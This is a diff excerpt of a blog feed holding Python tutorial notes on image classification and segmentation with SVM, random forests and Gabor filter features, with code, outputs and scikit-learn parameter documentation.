        test_features[i][w] += 1

# Perform Tf-Idf vectorization (as in training, idf is computed but not applied)
nbr_occurences = np.sum((test_features > 0) * 1, axis=0)
idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')

# Scale the features
# Standardize features by removing the mean and scaling to unit variance
# (stdSlr comes from the pickle file created during training)
test_features = stdSlr.transform(test_features)
• Up to this point the code is the same as in training, except for the k-means clustering step (the vocabulary voc is loaded rather than recomputed)

    • Report true class names so they can be compared with predicted classes
    true_class = [classes_names[i] for i in image_classes]
    • Perform the predictions and report predicted class names.
    predictions = [classes_names[i] for i in clf.predict(test_features)]
• Print the true classes and the predictions
    print ("true_class =" + str(true_class))
    print ("prediction =" + str(predictions))
true_class = ['Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
prediction = ['Parasitized', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
    • To make it easy to understand the accuracy let us print the confusion matrix
def showconfusionmatrix(cm):
    pl.matshow(cm)
    pl.title('Confusion matrix')
    pl.colorbar()
    pl.show()
    accuracy = accuracy_score(true_class, predictions)
    print ("accuracy = ", accuracy)
    cm = confusion_matrix(true_class, predictions)
    print (cm)
accuracy = 0.7
[[5 5]
 [1 9]]
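Reading the matrix (rows are true classes, columns are predictions, in the order Parasitized, Uninfected): 5 of 10 Parasitized and 9 of 10 Uninfected images are classified correctly, giving an accuracy of (5 + 9) / 20 = 0.7.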
    showconfusionmatrix(cm)


    png

If traditional methods (SVM, k-means, Random Forest) still do not give good enough accuracy, consider techniques such as deep neural networks.

    ]]>
    @@ -8768,7 +8768,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(68)-SVM/ - 正文

68 - Quick introduction to Support Vector Machines (SVM)

    sklearn.svm.SVC — scikit-learn 1.2.0 documentation

    C-Support Vector Classification.

    • The implementation is based on libsvm. The fit time scales at least quadratically with the number of samples and may be impractical beyond tens of thousands of samples. For large datasets consider using LinearSVC or SGDClassifier instead, possibly after a Nystroem transformer.

    • The multiclass support is handled according to a one-vs-one scheme.

    • For details on the precise mathematical formulation of the provided kernel functions and how gamma, coef0 and degree affect each other, see the corresponding section in the narrative documentation: Kernel functions.


    Read more in the User Guide.


**Parameters:**

    C: float, default=1.0

    • Regularization parameter. The strength of the regularization is inversely proportional to C. Must be strictly positive. The penalty is a squared l2 penalty.

    kernel: {‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’} or callable, default=’rbf’

    • Specifies the kernel type to be used in the algorithm. If none is given, ‘rbf’ will be used. If a callable is given it is used to pre-compute the kernel matrix from data matrices; that matrix should be an array of shape (n_samples, n_samples).

    degree: int, default=3

    • Degree of the polynomial kernel function (‘poly’). Must be non-negative. Ignored by all other kernels.

gamma: {‘scale’, ‘auto’} or float, default=’scale’

    • Kernel coefficient for ‘rbf’, ‘poly’ and ‘sigmoid’.

    • if gamma='scale' (default) is passed then it uses 1 / (n_features * X.var()) as value of gamma,

    • if ‘auto’, uses 1 / n_features

    • if float, must be non-negative.

    Changed in version 0.22: The default value of gamma changed from ‘auto’ to ‘scale’.

    coef0: float, default=0.0

    • Independent term in kernel function. It is only significant in ‘poly’ and ‘sigmoid’.

    shrinking: bool, default=True

    • Whether to use the shrinking heuristic. See the User Guide.

    probability: bool, default=False

    • Whether to enable probability estimates. This must be enabled prior to calling fit, will slow down that method as it internally uses 5-fold cross-validation, and predict_proba may be inconsistent with predict. Read more in the User Guide.

    tol: float, default=1e-3

    • Tolerance for stopping criterion.

    cache_size: float, default=200

    • Specify the size of the kernel cache (in MB).

    class_weight: dict or ‘balanced’, default=None

    • Set the parameter C of class i to class_weight[i]*C for SVC. If not given, all classes are supposed to have weight one. The “balanced” mode uses the values of y to automatically adjust weights inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).

    verbose: bool, default=False

    • Enable verbose output. Note that this setting takes advantage of a per-process runtime setting in libsvm that, if enabled, may not work properly in a multithreaded context.

    max_iter: int, default=-1

    • Hard limit on iterations within solver, or -1 for no limit.

    decision_function_shape: {‘ovo’, ‘ovr’}, default=’ovr’

    Whether to return a one-vs-rest (‘ovr’) decision function of shape (n_samples, n_classes) as all other classifiers, or the original one-vs-one (‘ovo’) decision function of libsvm which has shape (n_samples, n_classes * (n_classes - 1) / 2). However, note that internally, one-vs-one (‘ovo’) is always used as a multi-class strategy to train models; an ovr matrix is only constructed from the ovo matrix. The parameter is ignored for binary classification.

    Changed in version 0.19: decision_function_shape is ‘ovr’ by default.

    New in version 0.17: decision_function_shape=’ovr’ is recommended.

    Changed in version 0.17: Deprecated decision_function_shape=’ovo’ and None.

    break_ties: bool, default=False

    If true, decision_function_shape='ovr', and number of classes > 2, predict will break ties according to the confidence values of decision_function; otherwise the first class among the tied classes is returned. Please note that breaking ties comes at a relatively high computational cost compared to a simple predict.

    New in version 0.22.

    random_state: int, RandomState instance or None, default=None

    • Controls the pseudo random number generation for shuffling the data for probability estimates. Ignored when probability is False. Pass an int for reproducible output across multiple function calls. See Glossary.

**Attributes:**

    class_weight_: ndarray of shape (n_classes,)

    • Multipliers of parameter C for each class. Computed based on the class_weight parameter.

    classes_: ndarray of shape (n_classes,)
    The classes labels.

    coef_: ndarray of shape (n_classes * (n_classes - 1) / 2, n_features)

    • Weights assigned to the features when kernel=“linear”.

    dual_coef_: ndarray of shape (n_classes -1, n_SV)

    • Dual coefficients of the support vector in the decision function (see Mathematical formulation), multiplied by their targets. For multiclass, coefficient for all 1-vs-1 classifiers. The layout of the coefficients in the multiclass case is somewhat non-trivial. See the multi-class section of the User Guide for details.

    fit_status_: int

    • 0 if correctly fitted, 1 otherwise (will raise warning)

    intercept_: ndarray of shape (n_classes * (n_classes - 1) / 2,)

    • Constants in decision function.

    n_features_in_: int

    • Number of features seen during fit.

    New in version 0.24.

    feature_names_in_: ndarray of shape (n_features_in_,)

    • Names of features seen during fit. Defined only when X has feature names that are all strings.

    New in version 1.0.

    n_iter_: ndarray of shape (n_classes * (n_classes - 1) // 2,)

    • Number of iterations run by the optimization routine to fit the model. The shape of this attribute depends on the number of models optimized which in turn depends on the number of classes.

    New in version 1.1.

    support_: ndarray of shape (n_SV)

    • Indices of support vectors.

    support_vectors_: ndarray of shape (n_SV, n_features)
    Support vectors.

    n_support_: ndarray of shape (n_classes,), dtype=int32
    Number of support vectors for each class.

    probA_: ndarray of shape (n_classes * (n_classes - 1) / 2)
    Parameter learned in Platt scaling when probability=True.


    probB_: ndarray of shape (n_classes * (n_classes - 1) / 2)
    Parameter learned in Platt scaling when probability=True.

    shape_fit_: tuple of int of shape (n_dimensions_of_X,)
    Array dimensions of training vector X.
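To tie this reference material together, here is a minimal, self-contained usage sketch (a toy example of my own, not from the scikit-learn docs):

from sklearn.svm import SVC
import numpy as np

X = np.array([[0., 0.], [1., 1.], [1., 0.], [0., 1.]])
y = np.array([0, 1, 1, 0])

clf = SVC(kernel='rbf', C=1.0, gamma='scale')  # the defaults, written out explicitly
clf.fit(X, y)

print(clf.classes_)    # [0 1]
print(clf.n_support_)  # number of support vectors per class
print(clf.predict([[0.9, 0.9]]))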

    68b - SVM vs. Random Forest for image segmentation

import numpy as np
import cv2
import pandas as pd

img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif')
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img2 = img.reshape(-1)
df = pd.DataFrame()
df['Original Image'] = img2

# Generate Gabor features
num = 1
kernels = []
for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
        for lamda in np.arange(0, np.pi, np.pi / 4):
            for gamma in (0.05, 0.5):
                gabor_label = 'Gabor' + str(num)
                ksize = 9
                kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                kernels.append(kernel)
                fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                filtered_img = fimg.reshape(-1)
                df[gabor_label] = filtered_img
                num += 1

# CANNY EDGE
edges = cv2.Canny(img, 100, 200)
edges1 = edges.reshape(-1)
df['Canny Edge'] = edges1

from skimage.filters import roberts, sobel, scharr, prewitt

# ROBERTS EDGE
edge_roberts = roberts(img)
edge_roberts1 = edge_roberts.reshape(-1)
df['Roberts'] = edge_roberts1

# SOBEL
edge_sobel = sobel(img)
edge_sobel1 = edge_sobel.reshape(-1)
df['Sobel'] = edge_sobel1

# SCHARR
edge_scharr = scharr(img)
edge_scharr1 = edge_scharr.reshape(-1)
df['Scharr'] = edge_scharr1

# PREWITT
edge_prewitt = prewitt(img)
edge_prewitt1 = edge_prewitt.reshape(-1)
df['Prewitt'] = edge_prewitt1

# GAUSSIAN with sigma=3
from scipy import ndimage as nd

gaussian_img = nd.gaussian_filter(img, sigma=3)
gaussian_img1 = gaussian_img.reshape(-1)
df['Gaussian s3'] = gaussian_img1

# GAUSSIAN with sigma=7
gaussian_img2 = nd.gaussian_filter(img, sigma=7)
gaussian_img3 = gaussian_img2.reshape(-1)
df['Gaussian s7'] = gaussian_img3

# MEDIAN with size=3
median_img = nd.median_filter(img, size=3)
median_img1 = median_img.reshape(-1)
df['Median s3'] = median_img1

# VARIANCE with size=3
variance_img = nd.generic_filter(img, np.var, size=3)
variance_img1 = variance_img.reshape(-1)
df['Variance s3'] = variance_img1

######################################

# Now, add a column in the data frame for the labels
# For this, we need to import the labeled image
labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
# Remember that you can load an image with partial labels
# But drop the rows with unlabeled data

labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
labeled_img1 = labeled_img.reshape(-1)
df['Labels'] = labeled_img1

#########################################################

# Define the dependent variable that needs to be predicted (labels)
Y = df["Labels"].values

# Define the independent variables
X = df.drop(labels=["Labels"], axis=1)

# Split data into train and test to verify accuracy after fitting the model
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    from sklearn.svm import LinearSVC

    model = LinearSVC(max_iter=100)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\svm\_base.py:1225: ConvergenceWarning: Liblinear failed to converge, increase the number of iterations.
  warnings.warn(
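The convergence warning is expected here: max_iter=100 is very low and the features are on very different scales. A common remedy (my suggestion, not part of the original tutorial) is to standardize the features first, for example with a pipeline:

# Hypothetical fix for the ConvergenceWarning: scale the features before the linear SVM.
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC

model = make_pipeline(StandardScaler(), LinearSVC(max_iter=10000))
model.fit(X_train, Y_train)
prediction_test = model.predict(X_test)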

SVM is much slower than Random Forest.

    from sklearn import metrics

    print("Accuracy=", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy= 0.9525666606203519
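For a side-by-side comparison, the Random Forest counterpart would look like this (a sketch reusing the hyperparameters from tutorial 60; the RF code is not shown in this excerpt):

from sklearn.ensemble import RandomForestClassifier

rf_model = RandomForestClassifier(n_estimators=10, random_state=30)
rf_model.fit(X_train, Y_train)
rf_prediction = rf_model.predict(X_test)
print("RF Accuracy=", metrics.accuracy_score(Y_test, rf_prediction))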
# You can store the model for future use. In fact, this is how you do machine learning:
# train on training images, validate on test images, and deploy the model on unknown images.
# Store the trained model

import pickle

# Save the trained model to disk as a pickle file for future use
filename = "sandstone_model"
pickle.dump(model, open(filename, 'wb'))

# To test the model on future datasets
loaded_model = pickle.load(open(filename, 'rb'))
result = loaded_model.predict(X)

# Display the segmentation result as an image
segmented = result.reshape((img.shape))

from matplotlib import pyplot as plt

plt.imshow(segmented, cmap='jet')
plt.imsave('segmented_rock_RF_100_estim.jpg', segmented, cmap='jet')  # filename kept from the Random Forest version of this script

    png

This does not mean SVMs are useless; the point is that for pixel segmentation an SVM may not be the right choice, whereas for image classification SVMs actually do very well.

    ]]>
    @@ -8795,7 +8795,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(59-67)-Random%20Forest%20Classifier/ - 正文

    59 - What is Random Forest classifier

Many decision trees together make a forest; that is the Random Forest.

• Decision trees

For example, suppose we want to classify an image into:

• Air

• Pyrite

• Clay

• Pore

• Quartz

Classify based on the image's Pixel Value (gray level) and Texture:

    jpg

    • Why start with pixel value and not texture metric for this image?

    • Because it gives the best split of input data.

    • How to pick a node that gives the best split?

    • Use Gini impurity → pick the one that maximizes the Gini gain.

• Gini impurity is the probability of incorrectly classifying a randomly chosen element in the dataset if it were randomly labeled according to the class distribution in the dataset. It is calculated as (a worked example follows this list):

$$G=\sum_{i=1}^{C} p(i)\left(1-p(i)\right)$$

    • where $C$ is the number of classes and $p(i)$ is the probability of randomly picking an element of class $i$.

• Primary disadvantage of decision trees:
  They often suffer from overfitting → a tree works well on the training data but fails on new data, leading to low accuracy.

• Random Forest to the rescue!

  • Use a forest of many trees to work around the weaknesses of a single decision tree.
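A quick worked example (my own numbers): for a node containing 10 pixels, 6 of class Quartz and 4 of class Clay, $G = 0.6 \cdot 0.4 + 0.4 \cdot 0.6 = 0.48$, while a pure node with all pixels in one class gives $G = 0$. A candidate split is good if its child nodes have much lower impurity than the parent.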

    jpg

    60 - How to use Random Forest in Python

    import pandas as pd
    import matplotlib.pyplot as plt
    import numpy as np

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    sizes = df['Productivity'].value_counts(sort=1)
    sizes
Bad     42
Good    38
Name: Productivity, dtype: int64

Drop irrelevant columns

    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good

Drop missing data

    df = df.dropna()

Convert the labels to numbers

    df.Productivity[df.Productivity == 'Good'] = 1
    df.Productivity[df.Productivity == 'Bad'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1

Define the dependent variable

    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])

Define the independent variables

    X = df.drop(labels=['Productivity'], axis=1)

Split the data into training and test sets

    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)

Use a Random Forest

    sklearn.ensemble.RandomForestClassifier

    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
array([1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 1, 2, 1, 2,
       1, 1, 2, 1, 1, 2, 1, 1, 1, 1])

Compute the accuracy of the trained model

    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375

Increasing the proportion of training data can improve accuracy

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    model = RandomForestClassifier(n_estimators=10, random_state=30)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    prediction_test
    print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9375
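(The score happens to stay at 0.9375 here. With test_size=0.2 the test set holds only 16 of the 80 samples, so accuracy can only move in steps of 1/16, and the benefit of a larger training split may simply not show on such a tiny dataset.)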

Show the feature importances

    feature_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
    feature_imp
Time      0.714433
Coffee    0.205474
Age       0.080092
dtype: float64

Visualizing the random forest

Random forest visualization in Python (CSDN blog, in Chinese)

from IPython.display import HTML, display
from sklearn import tree
import pydotplus

estimators = model.estimators_
for m in estimators:
    dot_data = tree.export_graphviz(m, out_file=None,
                                    feature_names=['Time', 'Coffee', 'Age'],
                                    class_names=['Good', 'Bad'],
                                    filled=True, rounded=True,
                                    special_characters=True)
    graph = pydotplus.graph_from_dot_data(dot_data)
    # Render the SVG inline in a Jupyter notebook
    svg = graph.create_svg()
    if hasattr(svg, "decode"):
        svg = svg.decode("utf-8")
    html = HTML(svg)
    display(html)
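An alternative that avoids the pydotplus/Graphviz dependency (my suggestion, not from the original post) is scikit-learn's built-in matplotlib renderer, available since scikit-learn 0.21:

from sklearn import tree
import matplotlib.pyplot as plt

# Plot the first tree of the forest; looping over model.estimators_
# works the same way as with export_graphviz above.
fig, ax = plt.subplots(figsize=(12, 8))
tree.plot_tree(model.estimators_[0],
               feature_names=['Time', 'Coffee', 'Age'],
               class_names=['Good', 'Bad'],
               filled=True, rounded=True, ax=ax)
plt.show()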

    svg

    61 - How to create Gabor feature banks for machine learning

import numpy as np
import cv2
import matplotlib.pyplot as plt
import pandas as pd

img = cv2.imread('images/synthetic.jpg', 0)
df = pd.DataFrame()
img2 = img.reshape(-1)
df['Original Pixels'] = img2
df
    Original Pixels
    0 255
    1 255
    2 255
    3 255
    4 255
    ... ...
    363446 255
    363447 255
    363448 255
    363449 255
    363450 255

    363451 rows × 1 columns

    设置 Gabor 的不同参数构造出不同的卷积核,生成用于机器学习的 csv 文件:

    num = 1
    for sigma in (3, 5):
    for theta in range(2):
    theta = theta / 4. * np.pi
    for lamda in np.arange(0, np.pi, np.pi / 4.):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor ' + str(num)
    kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img
    num += 1
    df.head()
    Original Pixels Gabor 1 Gabor 2 Gabor 3 Gabor 4 Gabor 5 Gabor 6 Gabor 7 Gabor 8 Gabor 9 ... Gabor 23 Gabor 24 Gabor 25 Gabor 26 Gabor 27 Gabor 28 Gabor 29 Gabor 30 Gabor 31 Gabor 32
    0 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    1 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    2 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    3 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255
    4 255 0 0 0 0 0 0 255 255 0 ... 255 255 0 0 255 255 130 122 255 255

    5 rows × 33 columns

    df.to_csv('Gabor.csv')

    png

    62 - Image Segmentation using traditional machine learning - The plan

    ​ 讲了下后面几篇视频要干啥。

    63 - Image Segmentation using traditional machine learning Part1 - FeatureExtraction

    import numpy as np
    import cv2
    import pandas as pd
    import matplotlib.pyplot as plt

    img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x17d0c13f730>

    png

    df = pd.DataFrame()
    • Add original pixel values to the data frame as feature #1
    img2 = img.reshape(-1)
    df['Original Image'] = img2
    df.head()
    Original Image
    0 0
    1 0
    2 0
    3 0
    4 0
    • Add Other features

    • First set - Gabor features

    # Generate Gabor features
    num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
    kernels = []
    for theta in range(2): # Define number of thetas
    theta = theta / 4. * np.pi
    for sigma in (1, 3): # Sigma with 1 and 3
    for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
    for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
    gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
    ksize = 9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    # Now filter the image and add values to a new column
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img # Labels columns as Gabor1, Gabor2, etc.
    print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
    num += 1 # Increment for gabor column label
    Gabor1 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.05Gabor2 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.5Gabor3 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05Gabor4 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5Gabor5 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05Gabor6 : theta = 0.0 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5Gabor7 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05Gabor8 : theta = 0.0 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5Gabor9 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.05Gabor10 : theta = 0.0 : sigma = 3 : lamda = 0.0 : gamma = 0.5Gabor11 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05Gabor12 : theta = 0.0 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5Gabor13 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05Gabor14 : theta = 0.0 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5Gabor15 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05Gabor16 : theta = 0.0 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5Gabor17 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.05Gabor18 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.0 : gamma = 0.5Gabor19 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05Gabor20 : theta = 0.7853981633974483 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.5Gabor21 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.05Gabor22 : theta = 0.7853981633974483 : sigma = 1 : lamda = 1.5707963267948966 : gamma = 0.5Gabor23 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.05Gabor24 : theta = 0.7853981633974483 : sigma = 1 : lamda = 2.356194490192345 : gamma = 0.5Gabor25 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.05Gabor26 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.0 : gamma = 0.5Gabor27 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.05Gabor28 : theta = 0.7853981633974483 : sigma = 3 : lamda = 0.7853981633974483 : gamma = 0.5Gabor29 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.05Gabor30 : theta = 0.7853981633974483 : sigma = 3 : lamda = 1.5707963267948966 : gamma = 0.5Gabor31 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.05Gabor32 : theta = 0.7853981633974483 : sigma = 3 : lamda = 2.356194490192345 : gamma = 0.5
    • Gerate OTHER FEATURES and add them to the data frame

    • Canny edge

    edges = cv2.Canny(img, 100, 200)
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1
    • ROBERTS EDGE
    from skimage.filters import roberts, sobel, scharr, prewitt

    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1
    • SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1
    • SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1
    • PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1
    • GAUSSIAN with sigma = 3
    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1
    • GAUSSIAN with sigma = 7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3
    • MEDIAN with sigma = 3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1
    • VARIANCE with size = 3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1 # Add column to original dataframe

    df.head()
    Original Image Gabor1 Gabor2 Gabor3 Gabor4 Gabor5 Gabor6 Gabor7 Gabor8 Gabor9 ... Gabor32 Canny Edge Roberts Sobel Scharr Prewitt Gaussian s3 Gaussian s7 Median s3 Variance s3
    0 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    1 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    2 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    3 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0
    4 0 0 0 0 0 0 0 0 0 0 ... 0 0 0.0 0.0 0.0 0.0 0 0 0 0

    5 rows × 42 columns


    labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
    labeled_img1 = labeled_img.reshape(-1)
    df['Label'] = labeled_img1

    64 - Image Segmentation using traditional machine learning - Part2 Training RF

    • Dependent variable
    Y = df['Label'].values
    X = df.drop(labels=['Label'], axis=1)
    • Split data into test and train
    from sklearn.model_selection import train_test_split

    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    • Import ML algorithm and train the model
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier(n_estimators=10, random_state=42)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    from sklearn import metrics

    print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy = 0.9812850216441728

    65 - Image Segmentation using traditional machine learning - Part3 Feature Ranking

    fig = plt.figure(figsize=(12, 16))
    p = 1
    for index, feature in enumerate(df.columns):
    if index == 0:
    p += 1
    ax = fig.add_subplot(181)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text(feature)
    else:
    if p % 8 == 1:
    p += 1
    exec("ax" + str(index) + "=fig.add_subplot(6, 8, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
    exec("ax" + str(index) + ".title.set_text('" + feature + "')")
    p += 1
    plt.show()

    png

    importances = list(model.feature_importances_)
    features_list = list(X.columns)
    feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
    feature_imp
    Gabor4            0.248493Gaussian s3       0.168623Median s3         0.122685Original Image    0.092540Gabor8            0.086585Gabor11           0.076893Gabor3            0.070587Gabor6            0.021357Gaussian s7       0.020470Gabor24           0.011645Gabor7            0.010555Prewitt           0.010252Gabor21           0.007676Sobel             0.007102Gabor23           0.006989Gabor5            0.006329Scharr            0.005543Roberts           0.005393Gabor22           0.004461Variance s3       0.002942Gabor31           0.002886Gabor29           0.002720Gabor32           0.002607Gabor30           0.002361Canny Edge        0.001267Gabor12           0.001025Gabor20           0.000011Gabor28           0.000002Gabor27           0.000002Gabor14           0.000000Gabor26           0.000000Gabor25           0.000000Gabor1            0.000000Gabor19           0.000000Gabor18           0.000000Gabor17           0.000000Gabor16           0.000000Gabor10           0.000000Gabor9            0.000000Gabor15           0.000000Gabor2            0.000000Gabor13           0.000000dtype: float64

    66 - Image Segmentation using traditional machine learning - Part4 Pickling Model

    import pickle

    filename = 'sandstone_model'
    pickle.dump(model, open(filename, 'wb'))

    load_model = pickle.load(open(filename, 'rb'))
    result = load_model.predict(X)

    segmented = result.reshape((img.shape))
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='jet')
    <matplotlib.image.AxesImage at 0x17d37062220>

    png

    plt.imsave('segmented_rock.jpg', segmented, cmap='jet')

    67 - Image Segmentation using traditional machine learning - Part5 Segmenting Images

    import numpy as np
    import cv2
    import pandas as pd

    def feature_extraction(img):
    df = pd.DataFrame()


    # All features generated must match the way features are generated for TRAINING.
    # Feature1 is our original image pixels
